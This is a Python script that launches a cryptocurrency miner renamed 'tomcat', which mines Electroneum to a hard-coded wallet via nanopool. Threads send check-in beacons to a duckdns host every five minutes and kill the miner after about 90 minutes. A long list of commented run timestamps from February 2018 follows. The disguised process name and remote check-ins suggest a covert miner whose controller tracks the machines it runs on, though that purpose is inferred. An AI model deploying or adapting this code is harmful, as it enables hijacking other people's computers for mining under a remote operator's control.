import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:06.543048
#2018-02-17 16:21:03.955634
#2018-02-17 18:08:07.256606
#2018-02-17 19:56:06.805687
#2018-02-17 21:46:01.903405
#2018-02-17 23:31:01.489177
#2018-02-18 01:20:06.514198
#2018-02-18 03:07:03.313215
#2018-02-18 04:56:07.288172
#2018-02-18 06:49:06.902533
#2018-02-18 08:38:06.844173
#2018-02-18 10:24:03.624776
#2018-02-18 12:10:01.388022
#2018-02-18 13:56:04.753710
#2018-02-18 15:46:01.717674
#2018-02-18 17:35:09.329439
#2018-02-18 19:23:03.906268
#2018-02-18 21:08:06.663373
#2018-02-18 22:55:06.144298
#2018-02-19 00:43:05.004751
#2018-02-19 02:29:03.220195
#2018-02-19 04:16:06.416684
#2018-02-19 05:59:03.110018
#2018-02-19 07:48:08.092748
#2018-02-19 09:38:03.727087
#2018-02-19 11:26:06.434344
#2018-02-19 13:13:01.796513
#2018-02-19 15:02:05.154197
#2018-02-19 16:50:03.673810
#2018-02-19 18:38:07.431639
#2018-02-19 20:23:04.196714
#2018-02-19 22:11:04.263308
#2018-02-19 23:58:06.277354
#2018-02-20 01:45:04.244533
#2018-02-20 03:31:06.861865
#2018-02-20 05:18:04.914519
#2018-02-20 07:02:01.830297
#2018-02-20 08:48:06.106116
#2018-02-20 10:32:06.803151
#2018-02-20 12:17:04.722457
#2018-02-20 14:05:08.688601
#2018-02-20 15:49:07.971804
#2018-02-20 17:36:06.334806
#2018-02-20 19:23:06.666887
#2018-02-20 21:11:08.021042
#2018-02-20 22:57:01.764637
#2018-02-21 00:39:02.184881
#2018-02-21 02:26:02.202571
#2018-02-21 04:12:04.928179
#2018-02-21 05:59:06.026532
#2018-02-21 07:48:04.300431
#2018-02-21 09:28:01.475511
#2018-02-21 11:16:08.550876
#2018-02-21 13:06:06.755431
#2018-02-21 14:52:08.532917
#2018-02-21 16:39:01.908225
#2018-02-21 18:29:01.971309
#2018-02-21 20:14:05.397209
#2018-02-21 22:01:05.858820
#2018-02-21 23:48:01.454645
#2018-02-22 01:37:06.757078
#2018-02-22 03:25:03.823914
#2018-02-22 05:12:06.974914
#2018-02-22 06:56:01.365482
#2018-02-22 08:43:06.768117
#2018-02-22 10:31:06.505531
#2018-02-22 12:16:07.797234
#2018-02-22 14:03:07.401685
#2018-02-22 15:49:08.846505
#2018-02-22 17:36:01.557365
#2018-02-22 19:22:01.932567
#2018-02-22 21:14:03.959121
#2018-02-22 22:57:05.267895
#2018-02-23 00:43:06.995994
#2018-02-23 02:31:01.517157
#2018-02-23 04:19:06.066183
#2018-02-23 06:06:06.350690
#2018-02-23 07:52:05.980508
#2018-02-23 09:53:05.065014
#2018-02-23 11:49:08.487217
#2018-02-23 13:38:05.422764
#2018-02-23 15:26:01.725882
#2018-02-23 17:16:07.320544
#2018-02-23 19:01:02.142820
#2018-02-23 20:46:09.334307
#2018-02-23 22:35:05.701001
#2018-02-24 00:21:05.347618
#2018-02-24 02:13:06.232558
#2018-02-24 04:02:04.224704
#2018-02-24 05:46:07.593959
#2018-02-24 07:38:03.980558
#2018-02-24 09:23:03.713882
#2018-02-24 11:16:06.404699
#2018-02-24 13:05:07.450177
#2018-02-24 14:53:06.099502
#2018-02-24 16:43:05.940063
#2018-02-24 18:31:07.467861
#2018-02-24 20:17:06.221298
#2018-02-24 22:10:06.370565
#2018-02-25 01:07:06.268913
#2018-02-25 04:34:07.082059
#2018-02-25 08:01:05.572151